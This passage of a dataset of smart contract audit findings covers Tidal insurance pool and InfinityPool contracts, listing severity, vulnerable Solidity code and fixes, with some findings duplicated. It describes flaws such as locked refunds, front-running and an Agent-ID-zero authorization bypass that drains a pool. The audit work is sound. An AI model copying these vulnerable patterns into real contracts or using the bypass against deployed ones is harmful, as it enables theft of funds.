Pattern.\\n```\\n\\ncode/README.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. 
All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.","Refamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.",,```\\nEvery Pool is a standalone smart contract. 
It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n +initialize - Committee members array can contain duplicates,medium,"The initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.","The `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.",,```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n +Pool.buy- Users may end up paying more than intended due to changes in policy.weeklyPremium,medium,"The price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. 
If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n","Consider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.",,```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n +Missing validation checks in execute,medium,"The `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. 
To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now changeCommitteeThresholdis called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\n",Apply the same validation checks in the functions that execute the state change.,,```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n +Hard-coded minimum deposit amount,low,"Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. 
USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, ""Not enabled"");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, ""Less than minimum"");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.",The minimum deposit amount should be configurable.,,```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n +Outdated Solidity version,low,"The source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.","Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.",,```\\npragma solidity 0.8.10;\\n```\\n +Code used for testing purposes should be removed before deployment,low,"Variables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. 
For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\n","For the long term, consider mimicking this behavior by using features offered by your testing framework.",,```\\nmodifier onlyTest() {\\n```\\n +Missing events,low,Some state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. 
`Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\n,State-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.,,```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n +addPremium - A Back Runner May Cause an Insurance Holder to Lose Their Refunds by Calling addPremium Right After the Original Call,high,"`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. 
However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n",`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.,,```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n +refund - Attacker Can Lock Insurance Holder's Refunds by Calling refund Before a Refund Was Allocated,high,"`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. 
This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n",There should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.,,"```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n" 
+"addTidal, _updateUserTidal, withdrawTidal - Wrong Arithmetic Calculations",high,"To further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.",Implement the fixes described above. 
The versions without `SafeMath` are easier to read and should be preferred; see issue 3.13.,,```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n +claim - Incomplete and Lenient Implementation,high,"In the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n","To ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.",,"```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n" +buy - Insurance Buyers Trying to Increase Their Coverage Amount Will Lose Their Previous Coverage,high,"When a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. 
If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n",The coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.,,"```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n" +Several Issues Related to Upgradeability of Contracts,medium,"We did not find a proxy contract or factory in the repository, but the README contains the following information:\\nREADME.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\nREADME.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. 
All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.","Refamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.",,```\\nEvery Pool is a standalone smart contract. 
It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n +initialize - Committee Members Array Can Contain Duplicates,medium,"The initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.","The `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.",,```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n +Pool.buy- Users May End Up Paying More Than Intended Due to Changes in policy.weeklyPremium,medium,"The price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. 
If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n","Consider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.",,```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n +Missing Validation Checks in execute,medium,"The `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. 
To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now `changeCommitteeThreshold` is called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\n",Apply the same validation checks in the functions that execute the state change.,,```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n +Hard-Coded Minimum Deposit Amount,low,"Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g.
USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, ""Not enabled"");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, ""Less than minimum"");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.",The minimum deposit amount should be configurable.,,```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n +Outdated Solidity Version,low,"The source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.","Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.",,```\\npragma solidity 0.8.10;\\n```\\n +Code Used for Testing Purposes Should Be Removed Before Deployment,low,"Variables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. 
For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\n","For the long term, consider mimicking this behavior by using features offered by your testing framework.",,```\\nmodifier onlyTest() {\\n```\\n +Missing Events,low,Some state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. 
`Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\n,State-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.,,```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n +InfinityPool contract authorization bypass attack,high,"An attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier 
subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.",Ensure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +Wrong accounting for totalBorrowed in the InfinityPool.writeOff function,high,"Here is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? 
recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.",Resolution\\nFixed.,,"```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n" +The beneficiaryWithdrawable function can be called by anyone,high,"The `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = 
